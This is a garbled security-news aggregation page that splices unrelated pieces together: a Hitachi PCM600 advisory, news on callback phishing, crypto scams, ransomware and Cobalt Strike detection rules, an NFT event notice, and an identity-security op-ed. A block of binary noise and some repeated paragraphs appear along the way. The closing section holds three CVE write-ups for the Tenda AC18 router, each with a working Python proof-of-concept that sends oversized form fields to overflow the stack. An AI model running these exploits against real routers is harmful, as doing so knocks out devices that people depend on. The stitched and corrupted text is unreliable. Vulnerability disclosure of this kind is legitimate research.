A vulnerability exists in the Intelligent Electronic Device (IED) Connectivity Package (ConnPack) credential storage function in Hitachi Energy’s PCM600 product included in the versions listed below, where IEDs credentials are stored in a cleartext format in the PCM600 database. An attacker who manages to get access to the exported backup file can exploit the vulnerability and obtain credentials of the IEDs. The credentials may be used to perform unauthorized modifications such as loading incorrect configurations, reboot the IEDs or cause a denial-of-service on the IEDs.

�9�)���9�k�%E��oD �L�D9��I��B��h&��eW�BPn��c7��H� sv�T��0,��q1.�\]g� � ��&e����9;9R8$q҆Ψ�d�O��1�z�^R�)� %�q��9��&D���L�'1�G9mJ��'����20�|@��޻��nk����1�4m�����OX�ǇԄKN\_bJ�سI��Eб��ȐSB�:�82Cv��XR�d?���-F,�UY�F"��dɬ˒EYq��Ȍ���$ ͱ<����$�5�1�9��8p�����

CVE-2022-2513

The Luna Moth campaign has extorted hundreds of thousands of dollars from several victims in the legal and retail sectors.
The attacks are notable for employing a technique called callback phishing or telephone-oriented attack delivery (TOAD), wherein the victims are social engineered into making a phone call through phishing emails containing invoices and subscription-themed lures.
Palo Alto

The Luna Moth campaign has extorted hundreds of thousands of dollars from several victims in the legal and retail sectors.

The attacks are notable for employing a technique called callback phishing or telephone-oriented attack delivery (TOAD), wherein the victims are social engineered into making a phone call through phishing emails containing invoices and subscription-themed lures.

Palo Alto Networks Unit 42 said the attacks are the "product of a single highly organized campaign," adding, "this threat actor has significantly invested in call centers and infrastructure that's unique to each victim."

The cybersecurity firm described the activity as a "pervasive multi-month campaign that is actively evolving."

What's notable about callback phishing is that the email messages are completely devoid of any malicious attachment or booby-trapped link, allowing them to evade detection and slip past email protection solutions.

These messages typically come with an invoice that includes a phone number that the users can call to cancel the supposed subscription. In reality, however, the victims are routed to an actor-controlled call center and connected to a live agent on the other end, who ends up installing a remote access tool for persistence.

"The attacker will then seek to identify valuable information on the victim's computer and connected file shares, and they will quietly exfiltrate it to a server they control using a file transfer tool," Unit 42 researcher Kristopher Russo said.

The campaign may be resource intensive, but is also technically less sophisticated and likely to have a much higher success rate than other phishing attacks.

On top of that, it enables extortion without encryption, permitting malicious actors to plunder sensitive data sans the need to deploy ransomware to lock the files after exfiltration.

The Luna Moth actor, also known as Silent Ransom, has become an expert of sorts when it comes to pulling off such schemes. According to AdvIntel, the cybercrime group is believed to be the mastermind behind the BazarCall attacks last year.

To give these attacks a veneer of legitimacy, the adversaries, instead of dropping a malware like BazarLoader, take advantage of legitimate tools like Zoho Assist to remotely interact with a victim's computer, abusing the access to deploy other trusted software such as Rclone or WinSCP for harvesting data.

Extortion demands range from two to 78 Bitcoin based on the organization targeted, with the threat actor creating unique cryptocurrency wallets for each payment. The adversary is also said to offer discounts of nearly 25% for prompt payment, although there's no guarantee that the data is deleted.

"The threat actors behind this campaign have taken great pains to avoid all non-essential tools and malware, to minimize the potential for detection," Russo said. "Since there are very few early indicators that a victim is under attack, employee cybersecurity awareness training is the first line of defense."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Luna Moth Gang Invests in Call Centers to Target Businesses with Callback Phishing Campaigns

The U.S. Justice Department (DoJ) on Monday announced the takedown of seven domain names in connection to a "pig butchering" cryptocurrency scam. The fraudulent scheme, which operated from May to August 2022, netted the actors over $10 million from five victims, the DoJ said.
Pig butchering, also called Sha Zhu Pan, is a type of scam in which swindlers lure unsuspecting investors into sending

The U.S. Justice Department (DoJ) on Monday announced the takedown of seven domain names in connection to a "pig butchering" cryptocurrency scam. The fraudulent scheme, which operated from May to August 2022, netted the actors over $10 million from five victims, the DoJ said.

Pig butchering, also called Sha Zhu Pan, is a type of scam in which swindlers lure unsuspecting investors into sending their crypto assets. The criminals encounter potential victims on dating apps, social media sites, and SMS messages.

These individuals initiate fake relationships in an attempt to build trust, only to trick them into making a cryptocurrency investment on a bogus platform.

"Once the money is sent to the fake investment app, the scammer vanishes, taking all the money with them, often resulting in significant losses for the victim," the DoJ said.

The seven seized portals all mimicked the Singapore International Monetary Exchange (SIMEX), the agency pointed out.

But once the funds were transferred into wallet addresses supposedly provided by these domains, the digital currencies are said to have been immediately moved through an array of private wallets and swapping services to conceal the trail.

"Pig Butchering fraud highlights the lengths actors will go to socially engineer a target into falling victim to crime perpetuated by large cybercrime ecosystems," Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, previously told The Hacker News.

"The emotional manipulation, friendly tone, and sheer duration of the pre-exploitation phase allows genuine feelings to develop, and the actor exploits that emotion for financial gain, to the loss of sometimes millions of dollars."

An advisory released by the U.S. Federal Bureau of Investigation (FBI) last month noted how when the victims attempted to withdraw their investments, they were asked to pay extra taxes or penalties, leading to more loss.

The intelligence agency, in April, revealed it received more than 4,300 complaints related to crypto-romance scams, resulting in more than $429 million in losses.

A recent report from Proofpoint also detailed some of the other tactics adopted by the fraudsters, including suggesting shifting the conversation to Telegram or WhatsApp for a "more private chat" and encouraging the victims to send compromising photos.

"In addition to cryptocurrency-based lures, these criminal enterprises have used gold, forex, stocks, and other subjects to exploit their victims," researchers Tim Kromphardt and Genina Po said.

"Such schemes are successful due to the intimate nature of the conversations leading up to the 'slaughter.' Causing shame and embarrassment are key goals for threat actors that leverage this type of social engineering to exploit victims, similar to romance fraud."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

U.S. Authorities Seize Domains Used in 'Pig butchering' Cryptocurrency Scams

By Owais Sultan
This year, visitors to the gallery will be able to mint and claim a featured generative art NFT in real time. 
This is a post from HackRead.com Read the original post: Deciphering Value in Generative Art: Art Basel Miami Beach to Feature Tezos Blockchain NFTs

Art Basel Miami Beach will be featuring an exhibition, titled Performance in Code, Deciphering Value in Generative Art from December 1st – December 3rd, 2022, which includes a prominent display of Tezos blockchain non-fungible tokens (NFTs) in partnership with the generative art platform fxhash, in collaboration with Serpentine Arts Technologies.

This year, visitors to the gallery will be able to mint and claim a featured generative art NFT in real time. Just scan a QR code and you will instantly be able to claim your NFT.

The event will prompt attendees to experience the notion of generative art and reveal the uniqueness of NFTs through a collaborative art showcase. In addition, artists from the Tezos ecosystem will be featured in a conversation series that will examine the connection between the generative art process with blockchain technology.

Thirteen other artists will also share the exhibition space during the event. The live minting experience of the art installation, in which visitors scan a QR code to begin the process of producing an original, unique artwork created autonomously by the artists, is courtesy of the partnership with fxhash.

Once the installation finishes, the render is begun, and the work was displayed on the screen. The customer gains points right away. Visitors will see the value of an export display, which will be outlined as a percentage, grow as time passes.

The programming will run Friday, December 2 from 3:00 pm – 6:00 pm; Saturday, December 3rd from 11:30 am – 5:30 pm, and includes ‘Hybrid Worlds: Breaking Creative Boundaries’, a panel discussion hosted by Serpentine Arts Technologies. The Tezos NFT Speaker Series will feature the highlighted panels below and more:

**Changing the World, One NFT at a Time**

**Friday, December 2nd at 4:15 pm EDT**

*   This session will explore how social and environmental organizations are harnessing blockchain technology, to create a meaningful impact on the planet. We speak to the people who are using art NFTs for social good. 

**Value – In the Eye of the Creator** 

**Saturday, December 3rd at 12:30 pm EDT** 

*   As new art mediums emerge, we must re-evaluate how we determine the value of art. How do we appraise blockchain art? Is rarity important? Whose critique really matters? 

**NFTs, DAOs, IP: Redefining Art Law**

**Saturday, December 3rd at 1:30 pm EDT**

*   The onset of blockchain technology will reshape art law as we know it, as critical questions come to the fore. How do copyright laws apply to NFT art? How will smart contracts affect how art is bought and sold? What does the intellectual property look like in a decentralized world? How much power will DAOs hold in driving collective action amongst art communities?

For your information, Tezos is a blockchain that can evolve by upgrading itself. It does this through a continuous voting process among stakeholders to determine the changes that should be made and when they should be made. Because of this, Tezos is said to be self-amending.

The Tezos protocol offers two innovations: formal verification and on-chain governance. Formal verification allows for mathematical proof of the correctness of smart contracts. On-chain governance enables the network to upgrade without hard forks and roll back malicious activity more easily.

1.  Blokhaus’s New Open-Source NFT Tool Minterpress
2.  What is Blockchain Gaming and its Play-to-Earn Model?
3.  How Blockchain Can Revolutionize Personal Data Storage?
4.  Naoris Protocol to Use Blockchain to Plug Web3 Security Gaps
5.  Leading crypto firms and influencers to honor best in Web3 gaming

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

Deciphering Value in Generative Art: Art Basel Miami Beach to Feature Tezos Blockchain NFTs

In the cybersecurity world, augmenting the human touch with artificial intelligence has produced extremely positive results.

From robotic assembly lines to self-driving cars, automated processes powered by artificial intelligence (AI) are reshaping society in significant ways. But AI can't do everything on its own — in fact, many organizations are beginning to recognize that automation often functions best when it works hand in hand with a human operator. Likewise, humans can often operate more efficiently and effectively when they receive a helping hand from well-trained AI. Cybersecurity — particularly identity security — is a perfect example of a field where augmenting the human touch with AI has produced extremely positive results.

**Automation Is No Longer Optional**

Consider the volume of identities that exist in today's environments. Users, devices, applications, servers, cloud services, databases, DevOps containers, and countless other entities (both real and virtual) now have identities that need to be managed. In addition, modern employees utilize a wide range of technologies and data in order to be productive in enterprise environments. Together, those two dynamics create a challenge for identity security — at today's scale, understanding which identities need access to what systems has moved well beyond human capacity.

This is important because cybercriminals are targeting identities with increased frequency. The most recent "Verizon Data Breach Investigations Report" (DBIR) indicated that credential data is now used in nearly 50% of breaches, and stolen credentials are one of the most common ways attackers are able to compromise identities. Attackers use a variety of methods to obtain those credentials, but social engineering is perhaps the most popular. People make mistakes, and attackers have gotten very good at identifying ways to trick people into making them. This is a major part of what makes today's attackers so difficult to stop: Human beings are often the weak point, and human beings cannot be patched. Designing a preventative solution that stops 100% of attacks simply isn't possible.

**Shifting the Focus to Containment**

This isn't to say that preventative measures like employee education, multifactor authentication, and frequent password changes aren't important — they are. But they also aren't enough. Eventually, a determined attacker will find a vulnerable identity to compromise, and the organization will need to know what systems it had access to and whether those privileges exceeded its actual needs. If an accountant has their user identity compromised, that is a problem — but it is a problem that should be limited to the accounting department. But in an organization where overprovisioning is common, an attacker who compromises a single identity might have access to any number of systems. This problem is more common than you might think — when an organization has tens of thousands of identities to manage, ensuring that each one has privileges that line up with its essential functions is difficult.

At least, it used to be. Applied to identity security, AI-based technologies have made it possible to not only help enterprises manage identity permissions at scale, but evolve identity security decisions over time to ensure those decisions match the shifting needs and dynamics of the business. AI can be trained to identify patterns that normal, human users would never notice. For example, they might look for permissions that are rarely used and recommend that they be revoked — after all, if they aren't being used, why risk allowing an attacker to exploit them? These tools can be trained to identify when access to certain data is frequently requested by the same type of user. They can then flag that information to an IT team member, who can judge whether additional permissions are warranted.

By identifying these patterns, AI-based identity tools can help to establish more appropriate permissions for identities across the organization, while also providing IT staff with the information they need to make informed decisions as circumstances change. By eliminating extraneous, unnecessary permissions, AI tools ensure that compromising a single identity will not grant an attacker free reign throughout the entire system. They also mean that, far from impeding productivity, the IT team can enhance it. By quickly identifying when it is safe and appropriate to grant additional permissions, they can make sure all identities under management have access to the technology and data they need, when they need it. None of this would be possible without human beings and AI working hand in hand.

**AI-Driven Identity Security Is the Future**

Gone are the days when managing identities and their permissions could be accomplished manually — today, ensuring that each identity has the right level of access can only be accomplished with significant help from artificial intelligence-based technology. By augmenting the human touch with AI, organizations can combine the speed and accuracy of automation with the contextual judgment of human decision-making. Together, they can help organizations more effectively manage their identities and entitlements while significantly limiting the impact of any potential attack.

**About the Author**

    

Grady Summers has a variety of technology and leadership positions spanning over 20 years and now serves as the Executive Vice President of Product at SailPoint. Grady is responsible for driving SailPoint's technology road map and solution strategy, ensuring strong and consistent execution across SailPoint's identity portfolio.

Identity Security Needs Humans and AI Working Hand in Hand

The popular pen-testing tool is often cracked and repurposed by threat actors. Google now has a plan to address that.

Cobalt Strike, a popular red-team tool for detecting software vulnerabilities, has been repurposed by cyberattackers so frequently that publisher Fortra instituted a system for vetting potential buyers. In response, malicious actors have switched to using cracked versions of the software distributed online like any other hacker tool. Google's Cloud Security team has now come up with a way to counteract these shady uses while not interfering with legitimate ones: version detection.

Threat actors have easy access to Cobalt Strike through pirating, but these illegitimate versions usually cannot be updated, wrote Greg Sinclair, security engineer for cloud threat intelligence at Google. That provides Google researchers with a way to spot potentially malicious use by identifying the version of the software being used and flagging anything earlier than the current version.

To identify the version, Google researchers analyzed the Cobalt Strike JAR files from the past 10 years and generated signatures for the various components — 165 in all. Then the team bundled the signatures into a VirusTotal collection and released them as open source YARA rules on GitHub.

"Since many threat actors rely on cracked versions of Cobalt Strike to advance their cyberattacks, we hope that by disrupting its use we can help protect organizations, their employees, and their customers around the globe," Sinclair wrote.

Earlier in November, Google Cloud Threat Intelligence released on GitHub a similar set of signatures to detect Sliver, as Bleeping Computer pointed out. The command-and-control framework has been supplanting Cobalt Strike as the repurposed security tool of choice by some threat actors.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Releases YARA Rules to Disrupt Cobalt Strike Abuse

By Deeba Ahmed
AXLocker ransomware is now known as a threat that targets Discord users.
This is a post from HackRead.com Read the original post: Researchers Reveal Details of New Threats: AXLocker, Octocrypt and Alice Ransomware

Cyble Research and Intelligence Labs has discovered three new ransomware families that encrypt the victim’s documents and enable a Discord ATO (account takeover) to steal data.

The three variants include AXLocker, Octocrypt, and Alice Ransomware. It is worth noting that Discord is relatively popular among crypto and gaming communities.

(1) AXLocker’s dashboard – (2) Octocrypt’s ransom note (3) Alice’s ransom note (4) AXLocker’s ransom note – Images: Cyble –

**Ransomware Details- AXLocker**

Code analysis of the AXLocker ransomware revealed that it functions like any malware but only targets file extensions with AES encryption. The Startencryption() function makes the system capable of searching documents by enumerating the available directories on the C:\\ drive. Unlike other ransomware, AXLocker never modifies the encrypted files’ names or extensions.

Before encrypting, the ransomware steals the Discord tokens. The platform uses these tokens to authenticate users after logging into their accounts. This lets the attackers hijack the accounts for further malware propagation and fraud.

Once the Discord tokens are sent to an external server and the files are encrypted, the ransomware displays a pop-up window that contains the ransom note. There’s a timer that keeps ticking until the decryption key gets deleted.

**Octocrypt**

Another ransomware variant discovered by Cyble security researchers was Octocrypt. It is ransomware-as-a-service ransomware that targets Windows-based systems. Octocrypt was found in October 2022 and can be purchased on cybercrime forums for $400.

The variant’s web panel builder lets attackers generate ransomware binary executables after entering API, URL, crypto address, crypto amount, and contact email ID. Threat actors may download the payload file by clicking the URL contained in the web panel under payload details.

**Alice**

The third ransomware variant discovered was dubbed Alice or Alice in the Land of Malware. The ransomware builder is available for only $600 per month, and in return, the buyer gets responsive support, customization elements, and faster encryption capabilities. Moreover, it also offers compatibility with Asian/Arab PCs.

In their blog post, Cyble researchers stated that organizations should improve their scanning for the early warning signs of new variants and compromised credentials to thwart potential attacks. Enterprises must stay ahead of the attack techniques threat actors use to target their systems. This is possible only through implementing security best practices and enhanced security controls.

> “Threat actors are increasingly attempting to maintain a low profile to avoid drawing the attention of law enforcement agencies.”

1.  Lessons from the Holy Ghost Ransomware Attacks
2.  Ransomware Gang Leaks Medibank Data on Dark Web
3.  Royal Ransomware Uses Google Ads and Cracked Software

Researchers Reveal Details of New Threats: AXLocker, Octocrypt and Alice Ransomware

Tenda AC18 V15.03.05.05 is vulnerable to Buffer Overflow via function formSetDeviceName.

Permalink

Cannot retrieve contributors at this time

**Tenda AC18(V15.03.05.05) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2610.html

**Affected version**

V15.03.05.05

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetDeviceName function, which can be accessed through the URL goform/SetDeviceName.

In formSetDeviceName function, devName is controllable and will be passed into the local_1c parameter. Then local_1c will be spliced into acStack412 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

import socket
import os
li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')
ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x300
p2 \= b'devName=' + p1
p3 \= b"POST /goform/SetDeviceName" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111; curShow=; ac\_login\_info=passwork; test=A" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44174: IoT_vuln/Tenda_AC18_V15.03.05.05_Vuln_devName.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsStart function, which can be accessed through the URL goform/WifiWpsStart .

The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability. This vulnerability allows attackers to cause a Denial of Service (DoS).

**PoC**

Poc of Denial of Service(DoS)

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2
r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44177: IoT_vuln/Tenda/AC18/formWifiWpsStart at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetWifiGuestBasic function, which can be accessed through the URL goform/SetWifiGuestBasic.

In formSetWifiGuestBasic function, v14 is controllable and will be passed into the sub_7EA98 function. In the sub_7EA98 function, a2 will be spliced into s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

In set_wl_guest_qos_list function

In sub_7EA98 function

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'shareSpeed=' + p1

p3 \= b"POST /goform/SetWifiGuestBasic" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

Tag

#intel